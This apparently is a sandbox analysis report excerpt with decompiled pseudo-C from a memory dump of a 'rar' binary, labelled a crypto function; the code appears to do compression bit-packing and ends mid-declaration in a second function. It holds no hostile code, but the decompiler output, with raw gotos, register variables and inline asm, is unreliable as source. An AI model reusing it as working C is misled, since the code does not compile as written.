                                                                                                            Function 00007FF650B22680 Relevance: .5, Instructions: 540COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E00007FF67FF650B22680(signed long long __rax, long long __rcx, signed int __rdx, long long _a8, char _a16, char _a24, signed int _a32) {
				signed long long _v80;
				unsigned long long _v88;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* _t197;
				void* _t203;
				void* _t209;
				void* _t212;
				void* _t213;
				void* _t219;
				void* _t223;
				void* _t230;
				signed int _t242;
				unsigned int _t251;
				signed int _t255;
				signed int _t256;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed char _t268;
				signed char _t269;
				signed char _t272;
				signed char _t275;
				signed char _t276;
				signed char _t279;
				signed char _t280;
				signed char _t283;
				signed char _t284;
				signed char _t287;
				signed char _t288;
				signed char _t291;
				signed char _t292;
				signed char _t295;
				signed char _t296;
				signed char _t300;
				signed char _t301;
				signed char _t304;
				signed char _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t320;
				signed char _t321;
				signed char _t324;
				signed int _t330;
				signed int _t348;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t392;
				unsigned int _t396;
				signed int _t414;
				signed int _t452;
				signed long long _t458;
				unsigned long long _t459;
				signed long long _t460;
				unsigned long long _t461;
				void* _t465;
				signed long long _t466;
				void* _t486;
				void* _t494;
				void* _t502;
				void* _t511;
				void* _t514;
				signed int* _t519;
				signed long long _t521;
				intOrPtr* _t522;
				void* _t524;
				void* _t525;

				_t458 = __rax;
				_a8 = __rcx;
				_t501 = __rdx;
				_t503 = __rcx;
				_a24 = 0;
				_a16 = 0;
				if ( *((intOrPtr*)(__rdx + 0x850)) != 0) goto 0x50b226c3;
				E00007FF67FF650B22E38(_t465, __rcx, __rdx, __rdx, __rcx, _t511, _t514);
				_a16 = 1;
				_t522 =  *((intOrPtr*)(__rdx + 8));
				_t459 = _t522 + _t458 * 8;
				_v88 = _t459;
				if (_t522 - _t459 >= 0) goto 0x50b22d9b;
				if ( *_t522 != 0) goto 0x50b2273e;
				_t268 =  *(__rdx + 0x2c);
				r15d =  *(_t459 + __rdx + 0x690) & 0x000000ff;
				if (r15d - _t268 > 0) goto 0x50b22713;
				_t269 = _t268 - r15d;
				_t242 =  *(__rdx + 0x40 + _t459 * 4) << _t269 |  *(__rdx + 0x28);
				goto 0x50b22733;
				r15d = r15d - _t269;
				_t20 = _t501 + 0x18; // -2520
				 *(__rdx + 0x28) = _t242 >> r15d |  *(__rdx + 0x28);
				_t197 = E00007FF67FF650B47154(_t242 >> r15d |  *(__rdx + 0x28), _t459, _t465, _t20, __rdx, __rcx, _t511);
				_t272 = 0x20 - r15d;
				 *(__rdx + 0x28) = _t242 << _t272;
				 *(__rdx + 0x2c) = _t272;
				goto 0x50b22d7d;
				if (_t197 != 1) goto 0x50b22a02;
				_t330 =  *(_t522 + 1) & 0x000000ff;
				_a32 = _t330;
				if (_t330 - 0x20 >= 0) goto 0x50b22762;
				goto 0x50b2276e;
				_t460 = _t459 >> 3;
				r13d =  *(_t460 + 0x7ff650b95020) & 0x000000ff;
				_t31 = _t501 + 0x18; // -2520
				_t524 = _t31;
				_t275 =  *(_t524 + 0x14);
				_t33 = _t524 + 0x10; // -2504
				_t466 = _t33;
				r12d =  *(_t460 + __rdx + 0x690) & 0x000000ff;
				if (r12d - _t275 > 0) goto 0x50b227a0;
				_t276 = _t275 - r12d;
				_t382 =  *(__rdx + 0x40 + _t460 * 4) << _t276 |  *_t466;
				goto 0x50b227c4;
				r12d = r12d - _t276;
				 *_t466 = _t382 >> r12d |  *_t466;
				E00007FF67FF650B47154(_t382 >> r12d |  *_t466, _t460, _t466, _t524, __rdx, __rcx, _t511);
				_t279 = 0x20 - r12d;
				_t383 = _t382 << _t279;
				 *_t466 = _t383;
				 *(_t524 + 0x14) = 0x20;
				r9d = _t383;
				r13d =  *(_t521 + 0x7ff650b95178) & 0x000000ff;
				if (r13d == 0) goto 0x50b22830;
				r12d =  *(0x7ff650b10000 + 0x85120 + _t521 * 4);
				r12d = r12d & _a32;
				if (r13d - 0x20 > 0) goto 0x50b22806;
				_t280 = _t279 - r13d;
				r12d = r12d << _t280;
				r12d = r12d | _t383;
				 *_t466 = r12d;
				r9d = r12d;
				goto 0x50b2282c;
				r13d = r13d - _t280;
				 *_t466 = r12d >> r13d | r12d;
				E00007FF67FF650B47154(r12d >> r13d | r12d, _t460, _t466, _t524, __rdx, __rcx, 0x7ff650b10000);
				_t283 = 0x20 - r13d;
				_t386 = r12d << _t283;
				 *_t466 = _t386;
				r9d = _t386;
				 *(_t524 + 0x14) = 0x20;
				r8d =  *(_t522 + 4);
				_a32 = r8d;
				_v80 = _t460;
				r13d =  *(_t460 + __rdx + 0x7bb) & 0x000000ff;
				r12d =  *(__rdx + 0x4ec + _t460 * 4);
				if (r13d - 0x20 > 0) goto 0x50b22867;
				_t284 = _t283 - r13d;
				r12d = r12d << _t284;
				r12d = r12d | r9d;
				goto 0x50b22893;
				r13d = r13d - _t284;
				 *_t466 = r12d >> r13d | _t386;
				_t203 = E00007FF67FF650B47154(r12d >> r13d | _t386, _t460, _t466, _t524, __rdx, __rcx, 0x7ff650b10000);
				r8d = _a32;
				_t461 = _v80;
				_t287 = 0x20 - r13d;
				r12d = r12d << _t287;
				 *_t466 = r12d;
				r9d = r12d;
				 *(_t524 + 0x14) = 0x20;
				r13d =  *(_t461 + 0x7ff650b95198) & 0x000000ff;
				if (_t203 - 9 <= 0) goto 0x50b229f5;
				_a32 = r8d & 0x0000000f;
				if (r13d - 4 <= 0) goto 0x50b2292c;
				r13d = r13d + 0xfffffffc;
				r8d = r8d >> 4;
				_t389 =  *(0x7ff650b10000 + 0x85120 + _t521 * 4) >> 0x00000004 & r8d;
				if (r13d - 0x20 > 0) goto 0x50b228f9;
				_t288 = _t287 - r13d;
				r12d = _t389;
				r12d = r12d << _t288;
				r12d = r12d | r12d;
				goto 0x50b22922;
				r13d = r13d - _t288;
				 *_t466 = _t389 >> r13d | r12d;
				E00007FF67FF650B47154(_t389 >> r13d | r12d, _t461, _t466, _t524, __rdx, __rcx, 0x7ff650b10000);
				_t291 = 0x20 - r13d;
				r12d = _t389;
				r12d = r12d << _t291;
				 *_t466 = r12d;
				 *(_t524 + 0x14) = 0x20;
				r8b = _a24;
				if (r8b != 0) goto 0x50b229e7;
				r8b =  *((intOrPtr*)(_t522 + 3));
				_a24 = r8b;
				if (r8b != 0x10) goto 0x50b229a3;
				r13d =  *(__rdx + 0x807) & 0x000000ff;
				if (r13d - 0x20 > 0) goto 0x50b2296b;
				_t292 = _t291 - r13d;
				_t392 =  *(__rdx + 0x61c) << _t292 | r12d;
				goto 0x50b22989;
				r13d = r13d - _t292;
				_t348 = _t392 >> r13d | r12d;
				 *_t466 = _t348;
				E00007FF67FF650B47154(_t348, _t461, _t466, _t524, __rdx, _t503, 0x7ff650b10000);
				_t295 = 0x20 - r13d;
				 *_t466 = _t392 << _t295;
				 *(_t524 + 0x14) = 0x20;
				_a24 = 0xf;
				goto 0x50b22d7d;
				r13d =  *(_t461 + __rdx + 0x7f7) & 0x000000ff;
				if (r13d - 0x20 > 0) goto 0x50b229c7;
				_t296 = _t295 - r13d;
				_t396 =  *(__rdx + 0x5dc + _t461 * 4) << _t296 | _t348;
				 *(_t524 + 0x14) = 0x20;
				 *_t466 = _t396;
				goto 0x50b22997;
				r13d = r13d - _t296;
				 *_t466 = _t396 >> r13d | r12d;
				_t209 = E00007FF67FF650B47154(_t396 >> r13d | r12d, _t461, _t466, _t524, __rdx, _t503, 0x7ff650b10000);
				goto 0x50b229bf;
				r8b = r8b + 0xff;
				_a24 = r8b;
				goto 0x50b22997;
				goto 0x50b229b3;
				if (_t209 != 2) goto 0x50b22ad6;
				r13d =  *(_t522 + 4);
				if (r13d - 0x20 >= 0) goto 0x50b22a1e;
				goto 0x50b22a27;
				_t300 =  *(__rdx + 0x2c);
				r12d =  *(_t461 + __rdx + 0x690) & 0x000000ff;
				r15d =  *(__rdx + 0x40 + _t461 * 4);
				if (r12d - _t300 > 0) goto 0x50b22a4f;
				_t301 = _t300 - r12d;
				r15d = r15d << _t301;
				r15d = r15d |  *(__rdx + 0x28);
				goto 0x50b22a71;
				r12d = r12d - _t301;
				_t99 = _t501 + 0x18; // -2520
				 *(__rdx + 0x28) = r15d >> r12d |  *(__rdx + 0x28);
				E00007FF67FF650B47154(r15d >> r12d |  *(__rdx + 0x28), _t461, _t466, _t99, __rdx, _t503, 0x7ff650b10000);
				_t304 = 0x20 - r12d;
				r15d = r15d << _t304;
				 *(__rdx + 0x28) = r15d;
				 *(__rdx + 0x2c) = 0x20;
				r12d =  *(_t466 + 0x7ff650b951d8) & 0x000000ff;
				if (r12d == 0) goto 0x50b22997;
				if (r12d - 0x20 > 0) goto 0x50b22ab4;
				_t305 = _t304 - r12d;
				_t251 = ( *0x27FCF937D5120 & r13d) << _t305 | r15d;
				 *(__rdx + 0x2c) = 0x20;
				 *(__rdx + 0x28) = _t251;
				goto 0x50b22997;
				r12d = r12d - _t305;
				_t112 = _t501 + 0x18; // -2520
				 *(__rdx + 0x28) = _t251 >> r12d | r15d;
				_t212 = E00007FF67FF650B47154(_t251 >> r12d | r15d, _t461, _t466, _t112, __rdx, _t503, 0x7ff650b10000);
				goto 0x50b22aa9;
				if (_t212 != 3) goto 0x50b22af6;
				_t115 = _t501 + 0x18; // -2520
				r8d =  *(__rdx + 0x448);
				_t213 = E00007FF67FF650B472B0( *(__rdx + 0x792) & 0x000000ff, _t466, _t115, _t503);
				goto 0x50b22d85;
				if (_t213 != 4) goto 0x50b22b87;
				_t118 = _t501 + 0x18; // -2520
				_t504 = _t118;
				r8d =  *(__rdx + 0x40 + _t461 * 4);
				E00007FF67FF650B472B0( *(_t461 + __rdx + 0x690) & 0x000000ff, _t466, _t118, _t118);
				r15d =  *(_t522 + 1) & 0x000000ff;
				if (r15d - 0x20 >= 0) goto 0x50b22b37;
				goto 0x50b22b43;
				r8d =  *(__rdx + 0x620 + _t466 * 4);
				E00007FF67FF650B472B0( *(_t466 + __rdx + 0x808) & 0x000000ff, _t466, _t118, _t118);
				if (( *(_t466 + 0x7ff650b95178) & 0x000000ff) == 0) goto 0x50b22d7d;
				r8d =  *(0x7ff650b10000 + 0x85120 + __rdx * 4);
				r8d = r8d & r15d;
				_t219 = E00007FF67FF650B472B0( *(_t466 + 0x7ff650b95178) & 0x000000ff, _t466, _t118, _t504);
				goto 0x50b22d7d;
				if (_t219 != 5) goto 0x50b22be8;
				_t139 = _t501 + 0x18; // -2520
				E00007FF67FF650B47004(_t461 >> 3, _t466, _t139, __rdx, _t504);
				_t141 = _t501 + 0x828; // -456
				_v100 =  *((intOrPtr*)(__rdx + 0x38));
				_v104 = 5;
				E00007FF67FF650B2249C(_t466, _t141, _v104);
				if ( *((char*)(__rdx + 0x850)) == 0) goto 0x50b22d85;
				if ( *((intOrPtr*)(__rdx + 0x10)) - 1 <= 0) goto 0x50b22d85;
				_t223 = E00007FF67FF650B22E38(_t466, _t504, __rdx, __rdx, _t504, 0x7ff650b10000, 0x7ff650b10000);
				 *((char*)(__rdx + 0x850)) = 0;
				_a16 = 1;
				goto 0x50b22d8c;
				if (_t223 != 6) goto 0x50b22cf8;
				_t255 =  *(__rdx + 0x790) & 0x000000ff;
				_t150 = _t501 + 0x18; // -2520
				_t525 = _t150;
				_t311 =  *(_t525 + 0x14);
				_t152 = _t525 + 0x10; // -2504
				_t519 = _t152;
				if (_t255 - _t311 > 0) goto 0x50b22c17;
				_t312 = _t311 - _t255;
				goto 0x50b22c35;
				_t256 = _t255 - _t312;
				 *_t519 = ( *(__rdx + 0x440) << _t312 |  *_t519) >> _t256 |  *_t519;
				E00007FF67FF650B47154(( *(__rdx + 0x440) << _t312 |  *_t519) >> _t256 |  *_t519, _t461 >> 3, _t466, _t525, __rdx, _t504, 0x7ff650b10000);
				_t315 = 0x20 - _t256;
				_t464 = _v88 + 0xfffffff8;
				 *(_t525 + 0x14) = 0x20;
				if (_t522 != _v88 + 0xfffffff8) goto 0x50b22c90;
				if (0x20 - 2 < 0) goto 0x50b22c54;
				asm("bts esi, ecx");
				goto 0x50b22c7d;
				_t486 = _t525;
				 *_t519 = 1;
				E00007FF67FF650B47154(0x00000001 >> 0x00000002 | ( *(__rdx + 0x440) << _t312 |  *_t519) << _t315, _v88 + 0xfffffff8, _t466, _t486, __rdx, _t504, 0x7ff650b10000);
				 *_t519 = 1;
				_a16 = 0;
				 *(_t525 + 0x14) = 0x20;
				goto 0x50b22cbf;
				 *_t519 = 1;
				_t158 = _t486 - 2; // 0x1e
				if (0x20 - 2 - _t315 + 0xfffffffe - 2 < 0) goto 0x50b22ca2;
				 *(_t525 + 0x14) = _t158;
				goto 0x50b22cb8;
				E00007FF67FF650B47154(1 << 0x20 - 2 - _t315 + 0xfffffffe, _v88 + 0xfffffff8, _t466, _t525, __rdx, _t504, 0x7ff650b10000);
				 *_t519 =  *_t519 & 0x00000000;
				_t160 = _t466 + 0x20; // 0x3e
				 *(_t525 + 0x14) = _t160;
				E00007FF67FF650B47004(_v88 + 0xfffffff8, _t466, _t525, __rdx, _t504);
				_t164 = _t501 + 0x828; // -456
				_v92 =  *((intOrPtr*)(__rdx + 0x38));
				_v96 = 6;
				_t230 = E00007FF67FF650B2249C(_t466, _t164, _v96);
				goto 0x50b22d8c;
				if (_t230 != 7) goto 0x50b22d85;
				_t171 = _t501 + 0x18; // -2520
				_t506 = _t171;
				r8d =  *(__rdx + 0x444);
				E00007FF67FF650B472B0( *(__rdx + 0x791) & 0x000000ff, _t466, _t171, _t171);
				r8d =  *(_t522 + 1) & 0x000000ff;
				E00007FF67FF650B472B0(8, _t466, _t171, _t171);
				_t262 =  *(_t522 + 4);
				if (_t262 - 6 <= 0) goto 0x50b22d5a;
				if (_t262 - 0x106 > 0) goto 0x50b22d50;
				r8d = _t466 - 7;
				E00007FF67FF650B472B0(8, _t466, _t171, _t506);
				goto 0x50b22d5e;
				r8d = _t262;
				goto 0x50b22d49;
				_t452 = _t262;
				if (_t452 == 0) goto 0x50b22d7d;
				r8d =  *(_t522 + 0xc) & 0x000000ff;
				E00007FF67FF650B472B0(8, _t466, _t506, _t506);
				if (_t452 != 0) goto 0x50b22d62;
				if (_t522 + 8 - _v88 < 0) goto 0x50b226e8;
				if (_a16 == 0) goto 0x50b22e26;
				_t264 =  *(__rdx + 0x790) & 0x000000ff;
				_t502 = __rdx + 0x18;
				_t320 =  *(_t502 + 0x14);
				if (_t264 - _t320 > 0) goto 0x50b22dc4;
				_t321 = _t320 - _t264;
				goto 0x50b22de0;
				_t265 = _t264 - _t321;
				_t494 = _t502;
				 *(_t502 + 0x10) = ( *(__rdx + 0x440) << _t321 |  *(_t502 + 0x10)) >> _t265 |  *(_t502 + 0x10);
				E00007FF67FF650B47154(( *(__rdx + 0x440) << _t321 |  *(_t502 + 0x10)) >> _t265 |  *(_t502 + 0x10), _v88 + 0xfffffff8, _t466 - 1, _t494, _v96, _a8, 0x7ff650b10000);
				_t324 = 0x20 - _t265;
				 *(_t502 + 0x14) = _t324;
				if (_t324 - 1 < 0) goto 0x50b22df0;
				_t188 = _t494 - 1; // 0x1f
				asm("bts esi, ebp");
				goto 0x50b22e18;
				 *(_t502 + 0x10) = 1;
				E00007FF67FF650B47154(0x00000001 >> 0x00000001 | ( *(__rdx + 0x440) << _t321 |  *(_t502 + 0x10)) << _t324, _v88 + 0xfffffff8, _t466 - 1, _t502, _v96, _a8, 0x7ff650b10000);
				_t414 = _t188 - 1 - _t324;
				 *(_t502 + 0x10) = 1 << _t414;
				 *(_t502 + 0x14) = _t414;
				return E00007FF67FF650B47004(_t464, _t466 - 1, _t502, _v96, _a8);
			}














































































                                                                                                            0x7ff650b22680
                                                                                                            0x7ff650b22680
                                                                                                            0x7ff650b22699
                                                                                                            0x7ff650b2269c
                                                                                                            0x7ff650b2269f
                                                                                                            0x7ff650b226a6
                                                                                                            0x7ff650b226b3
                                                                                                            0x7ff650b226b5
                                                                                                            0x7ff650b226bc
                                                                                                            0x7ff650b226c3
                                                                                                            0x7ff650b226cf
                                                                                                            0x7ff650b226d3
                                                                                                            0x7ff650b226db
                                                                                                            0x7ff650b226ed
                                                                                                            0x7ff650b226f4
                                                                                                            0x7ff650b226f7
                                                                                                            0x7ff650b22707
                                                                                                            0x7ff650b22709
                                                                                                            0x7ff650b2270e
                                                                                                            0x7ff650b22711
                                                                                                            0x7ff650b22713
                                                                                                            0x7ff650b2271d
                                                                                                            0x7ff650b22724
                                                                                                            0x7ff650b22727
                                                                                                            0x7ff650b2272e
                                                                                                            0x7ff650b22733
                                                                                                            0x7ff650b22736
                                                                                                            0x7ff650b22739
                                                                                                            0x7ff650b22740
                                                                                                            0x7ff650b22746
                                                                                                            0x7ff650b2274b
                                                                                                            0x7ff650b22756
                                                                                                            0x7ff650b22760
                                                                                                            0x7ff650b22762
                                                                                                            0x7ff650b2276e
                                                                                                            0x7ff650b22772
                                                                                                            0x7ff650b22772
                                                                                                            0x7ff650b22776
                                                                                                            0x7ff650b2277a
                                                                                                            0x7ff650b2277a
                                                                                                            0x7ff650b22785
                                                                                                            0x7ff650b22795
                                                                                                            0x7ff650b22797
                                                                                                            0x7ff650b2279c
                                                                                                            0x7ff650b2279e
                                                                                                            0x7ff650b227a0
                                                                                                            0x7ff650b227af
                                                                                                            0x7ff650b227b1
                                                                                                            0x7ff650b227bf
                                                                                                            0x7ff650b227c2
                                                                                                            0x7ff650b227c4
                                                                                                            0x7ff650b227cd
                                                                                                            0x7ff650b227d1
                                                                                                            0x7ff650b227d4
                                                                                                            0x7ff650b227e0
                                                                                                            0x7ff650b227e2
                                                                                                            0x7ff650b227ea
                                                                                                            0x7ff650b227f0
                                                                                                            0x7ff650b227f2
                                                                                                            0x7ff650b227f5
                                                                                                            0x7ff650b227f8
                                                                                                            0x7ff650b227fe
                                                                                                            0x7ff650b22801
                                                                                                            0x7ff650b22804
                                                                                                            0x7ff650b22806
                                                                                                            0x7ff650b22816
                                                                                                            0x7ff650b22818
                                                                                                            0x7ff650b22822
                                                                                                            0x7ff650b22825
                                                                                                            0x7ff650b22827
                                                                                                            0x7ff650b22829
                                                                                                            0x7ff650b2282c
                                                                                                            0x7ff650b22835
                                                                                                            0x7ff650b22839
                                                                                                            0x7ff650b22841
                                                                                                            0x7ff650b22846
                                                                                                            0x7ff650b2284f
                                                                                                            0x7ff650b2285a
                                                                                                            0x7ff650b2285c
                                                                                                            0x7ff650b2285f
                                                                                                            0x7ff650b22862
                                                                                                            0x7ff650b22865
                                                                                                            0x7ff650b22867
                                                                                                            0x7ff650b22877
                                                                                                            0x7ff650b22879
                                                                                                            0x7ff650b2287e
                                                                                                            0x7ff650b22888
                                                                                                            0x7ff650b2288d
                                                                                                            0x7ff650b22890
                                                                                                            0x7ff650b22893
                                                                                                            0x7ff650b22896
                                                                                                            0x7ff650b22899
                                                                                                            0x7ff650b228a4
                                                                                                            0x7ff650b228b5
                                                                                                            0x7ff650b228c1
                                                                                                            0x7ff650b228cc
                                                                                                            0x7ff650b228d6
                                                                                                            0x7ff650b228dd
                                                                                                            0x7ff650b228e1
                                                                                                            0x7ff650b228e7
                                                                                                            0x7ff650b228e9
                                                                                                            0x7ff650b228ee
                                                                                                            0x7ff650b228f1
                                                                                                            0x7ff650b228f4
                                                                                                            0x7ff650b228f7
                                                                                                            0x7ff650b228f9
                                                                                                            0x7ff650b22909
                                                                                                            0x7ff650b2290b
                                                                                                            0x7ff650b22919
                                                                                                            0x7ff650b2291c
                                                                                                            0x7ff650b2291f
                                                                                                            0x7ff650b22925
                                                                                                            0x7ff650b22928
                                                                                                            0x7ff650b2292c
                                                                                                            0x7ff650b22937
                                                                                                            0x7ff650b2293d
                                                                                                            0x7ff650b22941
                                                                                                            0x7ff650b2294d
                                                                                                            0x7ff650b2294f
                                                                                                            0x7ff650b22960
                                                                                                            0x7ff650b22962
                                                                                                            0x7ff650b22967
                                                                                                            0x7ff650b22969
                                                                                                            0x7ff650b2296b
                                                                                                            0x7ff650b22978
                                                                                                            0x7ff650b2297b
                                                                                                            0x7ff650b2297d
                                                                                                            0x7ff650b22984
                                                                                                            0x7ff650b22989
                                                                                                            0x7ff650b2298b
                                                                                                            0x7ff650b2298f
                                                                                                            0x7ff650b2299e
                                                                                                            0x7ff650b229aa
                                                                                                            0x7ff650b229b6
                                                                                                            0x7ff650b229b8
                                                                                                            0x7ff650b229bd
                                                                                                            0x7ff650b229bf
                                                                                                            0x7ff650b229c3
                                                                                                            0x7ff650b229c5
                                                                                                            0x7ff650b229c7
                                                                                                            0x7ff650b229d7
                                                                                                            0x7ff650b229d9
                                                                                                            0x7ff650b229e5
                                                                                                            0x7ff650b229e7
                                                                                                            0x7ff650b229eb
                                                                                                            0x7ff650b229f3
                                                                                                            0x7ff650b22a00
                                                                                                            0x7ff650b22a04
                                                                                                            0x7ff650b22a0a
                                                                                                            0x7ff650b22a11
                                                                                                            0x7ff650b22a1c
                                                                                                            0x7ff650b22a27
                                                                                                            0x7ff650b22a30
                                                                                                            0x7ff650b22a39
                                                                                                            0x7ff650b22a41
                                                                                                            0x7ff650b22a43
                                                                                                            0x7ff650b22a46
                                                                                                            0x7ff650b22a49
                                                                                                            0x7ff650b22a4d
                                                                                                            0x7ff650b22a4f
                                                                                                            0x7ff650b22a5a
                                                                                                            0x7ff650b22a61
                                                                                                            0x7ff650b22a64
                                                                                                            0x7ff650b22a6b
                                                                                                            0x7ff650b22a6e
                                                                                                            0x7ff650b22a71
                                                                                                            0x7ff650b22a7c
                                                                                                            0x7ff650b22a7f
                                                                                                            0x7ff650b22a8b
                                                                                                            0x7ff650b22a9f
                                                                                                            0x7ff650b22aa1
                                                                                                            0x7ff650b22aa6
                                                                                                            0x7ff650b22aa9
                                                                                                            0x7ff650b22aac
                                                                                                            0x7ff650b22aaf
                                                                                                            0x7ff650b22ab4
                                                                                                            0x7ff650b22abe
                                                                                                            0x7ff650b22ac5
                                                                                                            0x7ff650b22ac8
                                                                                                            0x7ff650b22ad4
                                                                                                            0x7ff650b22ad8
                                                                                                            0x7ff650b22ae1
                                                                                                            0x7ff650b22ae5
                                                                                                            0x7ff650b22aec
                                                                                                            0x7ff650b22af1
                                                                                                            0x7ff650b22af8
                                                                                                            0x7ff650b22b02
                                                                                                            0x7ff650b22b02
                                                                                                            0x7ff650b22b16
                                                                                                            0x7ff650b22b1b
                                                                                                            0x7ff650b22b20
                                                                                                            0x7ff650b22b2b
                                                                                                            0x7ff650b22b35
                                                                                                            0x7ff650b22b51
                                                                                                            0x7ff650b22b59
                                                                                                            0x7ff650b22b69
                                                                                                            0x7ff650b22b6f
                                                                                                            0x7ff650b22b7a
                                                                                                            0x7ff650b22b7d
                                                                                                            0x7ff650b22b82
                                                                                                            0x7ff650b22b89
                                                                                                            0x7ff650b22b8b
                                                                                                            0x7ff650b22b8f
                                                                                                            0x7ff650b22b97
                                                                                                            0x7ff650b22b9e
                                                                                                            0x7ff650b22ba2
                                                                                                            0x7ff650b22bac
                                                                                                            0x7ff650b22bb8
                                                                                                            0x7ff650b22bc2
                                                                                                            0x7ff650b22bce
                                                                                                            0x7ff650b22bd5
                                                                                                            0x7ff650b22bdc
                                                                                                            0x7ff650b22be3
                                                                                                            0x7ff650b22bea
                                                                                                            0x7ff650b22bf0
                                                                                                            0x7ff650b22bf7
                                                                                                            0x7ff650b22bf7
                                                                                                            0x7ff650b22bfb
                                                                                                            0x7ff650b22bff
                                                                                                            0x7ff650b22bff
                                                                                                            0x7ff650b22c0b
                                                                                                            0x7ff650b22c0d
                                                                                                            0x7ff650b22c15
                                                                                                            0x7ff650b22c17
                                                                                                            0x7ff650b22c26
                                                                                                            0x7ff650b22c2a
                                                                                                            0x7ff650b22c31
                                                                                                            0x7ff650b22c3a
                                                                                                            0x7ff650b22c3e
                                                                                                            0x7ff650b22c45
                                                                                                            0x7ff650b22c4a
                                                                                                            0x7ff650b22c4f
                                                                                                            0x7ff650b22c52
                                                                                                            0x7ff650b22c64
                                                                                                            0x7ff650b22c69
                                                                                                            0x7ff650b22c6d
                                                                                                            0x7ff650b22c7f
                                                                                                            0x7ff650b22c83
                                                                                                            0x7ff650b22c8a
                                                                                                            0x7ff650b22c8e
                                                                                                            0x7ff650b22c90
                                                                                                            0x7ff650b22c94
                                                                                                            0x7ff650b22c9a
                                                                                                            0x7ff650b22c9c
                                                                                                            0x7ff650b22ca0
                                                                                                            0x7ff650b22ca7
                                                                                                            0x7ff650b22cac
                                                                                                            0x7ff650b22cb1
                                                                                                            0x7ff650b22cb4
                                                                                                            0x7ff650b22cc2
                                                                                                            0x7ff650b22cca
                                                                                                            0x7ff650b22cd1
                                                                                                            0x7ff650b22cd5
                                                                                                            0x7ff650b22cdf
                                                                                                            0x7ff650b22cf3
                                                                                                            0x7ff650b22cfa
                                                                                                            0x7ff650b22d07
                                                                                                            0x7ff650b22d07
                                                                                                            0x7ff650b22d0b
                                                                                                            0x7ff650b22d15
                                                                                                            0x7ff650b22d1a
                                                                                                            0x7ff650b22d27
                                                                                                            0x7ff650b22d2c
                                                                                                            0x7ff650b22d33
                                                                                                            0x7ff650b22d3e
                                                                                                            0x7ff650b22d40
                                                                                                            0x7ff650b22d49
                                                                                                            0x7ff650b22d4e
                                                                                                            0x7ff650b22d50
                                                                                                            0x7ff650b22d58
                                                                                                            0x7ff650b22d5a
                                                                                                            0x7ff650b22d5c
                                                                                                            0x7ff650b22d62
                                                                                                            0x7ff650b22d6e
                                                                                                            0x7ff650b22d7b
                                                                                                            0x7ff650b22d95
                                                                                                            0x7ff650b22d9d
                                                                                                            0x7ff650b22da3
                                                                                                            0x7ff650b22db0
                                                                                                            0x7ff650b22db4
                                                                                                            0x7ff650b22db9
                                                                                                            0x7ff650b22dbb
                                                                                                            0x7ff650b22dc2
                                                                                                            0x7ff650b22dc4
                                                                                                            0x7ff650b22dcc
                                                                                                            0x7ff650b22dd2
                                                                                                            0x7ff650b22dd5
                                                                                                            0x7ff650b22ddc
                                                                                                            0x7ff650b22de0
                                                                                                            0x7ff650b22de6
                                                                                                            0x7ff650b22de8
                                                                                                            0x7ff650b22deb
                                                                                                            0x7ff650b22dee
                                                                                                            0x7ff650b22e05
                                                                                                            0x7ff650b22e08
                                                                                                            0x7ff650b22e0d
                                                                                                            0x7ff650b22e18
                                                                                                            0x7ff650b22e1e
                                                                                                            0x7ff650b22e36

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4c199d22da4a7536fe3bb3fbde6e9e967c0fb70ad2fd5703ae988a5354036f63
                                                                                                            • Instruction ID: 79689beaafd874be0d06931d172d8f51e2989064e56c040424cb097d5c1578e8
                                                                                                            • Opcode Fuzzy Hash: 4c199d22da4a7536fe3bb3fbde6e9e967c0fb70ad2fd5703ae988a5354036f63
                                                                                                            • Instruction Fuzzy Hash: A4222532A0819377EB18CF2599942BD3B91F746744F494139DB9BA3B85CF3AE815CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B4F7F4 Relevance: .5, Instructions: 505COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 43%
                                                                                                            			E00007FF67FF650B4F7F4(void* __edx, void* __eflags, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r10, void* __r11) {
				void* __rbp;
				void* __r13;
				void* __r15;
				void* _t257;
				void* _t269;
				signed int _t271;
				signed int _t280;
				void* _t322;
				signed int _t333;
				void* _t362;
				void* _t378;
				signed long long _t379;
				signed long long _t380;
				intOrPtr _t381;
				signed long long _t383;
				signed long long _t385;
				signed long long _t403;
				long long _t410;
				signed long long _t413;
				signed long long _t414;
				signed long long _t415;
				long long _t417;
				long long _t439;
				void* _t453;
				intOrPtr _t457;
				void* _t470;
				signed long long _t477;
				intOrPtr _t483;
				intOrPtr _t486;
				void* _t495;
				void* _t496;
				void* _t497;
